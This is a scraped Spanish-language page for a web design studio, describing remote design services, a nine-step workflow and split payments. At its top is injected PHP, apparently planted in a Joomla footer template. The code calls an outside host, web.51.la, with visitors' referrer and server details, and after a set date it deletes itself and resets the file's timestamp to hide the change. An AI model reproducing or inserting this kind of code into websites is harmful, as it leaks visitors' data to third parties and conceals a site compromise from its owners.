check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Trabajamos Para el Mundo

Diseñamos su sitio WEB utilizando las últimas tecnologías para que aparezca con la mejor presencia en todos los buscadores

Trabajo a Distancia, Diseño Web a Distancia, Teletrabajo, Trabajo para el exteriorOfrecemos nuestro servicio de diseño y desarrollo web a distancia basado en experiencias con exelentes resultados de trabajos realizados para varios países.

Estudio Alas brinda soluciones web a clientes en el exterior con una fluida comunicación a través de internet (Skype, Email, MSN) o teléfono, ofreciendo un constante soporte a los clientes que así lo requieran. 

Garantizamos dedicación, seriedad y prefesionalismo en cada trabajo, poniendo atención a cada requerimiento e inquietud que el cliente nos transmita.

Ofrecemos soluciones de excelente calidad a precios muy convenientes para el mercado a nivel mundial, lo cual hacen de nuestras propuestas una excelente inversión.

Gran experiencia en:

 

Ver Portfolio Web

Metodología de trabajo:

Desarrollo de un sitio web

  1. Se envía presupuesto según características solicitadas por el cliente.
  2. Una vez aprobado, se deberá abonar el pago correspondiente al 50% del trabajo (utilizando los métodos de pago aceptados por EA)
  3. Se presenta el boceto del diseño de la pagina principal del sitio web (mostrando el diseño global del sitio, formas, paleta de colores, estilos)
  4. Se realizan las modificaciones que el cliente crea necesarias
  5. Una vez aprobado el diseño, se realiza la maquetación, animaciones y desarrollo de las secciones internas del sitio
  6. El cliente podrá ver el proceso de desarrollo, ya que se irán subiendo los avances a un link interno de EA
  7. Se muestra el trabajo al cliente para su aprobación final o últimos ajustes
  8. Se publica en la web
  9. Se deberá abonar el pago correspondiente al 50% restante

 

Aceptamos los siguientes métodos de pago internacionales:

iconos_pagos_en_contenido